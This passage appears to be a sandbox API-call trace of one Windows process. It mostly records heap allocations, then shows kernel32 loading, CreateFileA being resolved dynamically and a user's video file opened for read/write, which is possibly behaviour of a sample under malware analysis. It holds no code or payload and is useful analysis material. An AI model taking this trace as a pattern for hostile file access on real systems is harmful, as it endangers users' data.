(HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0192.765] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0192.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0192.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0192.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0192.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0192.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0192.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0192.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0192.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0192.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0192.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0192.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0192.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0192.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0192.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0192.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0192.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0192.768] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0192.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0192.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0192.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0192.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.772] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0192.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba3d8 [0192.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba3d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0192.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.772] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0192.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0192.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0192.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba3d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0192.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.773] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0192.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0192.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0192.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0192.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0192.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0192.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0192.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3c) returned 0x8db138 [0192.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv", cchWideChar=60, lpMultiByteStr=0x8db138, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv", lpUsedDefaultChar=0x0) returned 60 [0192.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0192.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.774] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\s8en.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0192.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0192.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0192.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0192.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0192.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0192.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=60, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0192.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x78) returned 0x8afee8 [0192.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=60, lpWideCharStr=0x8afee8, cchWideChar=60 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv") returned 60 [0192.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0192.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0192.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afee8 | out: hHeap=0x8a0000) returned 1 [0192.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0192.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 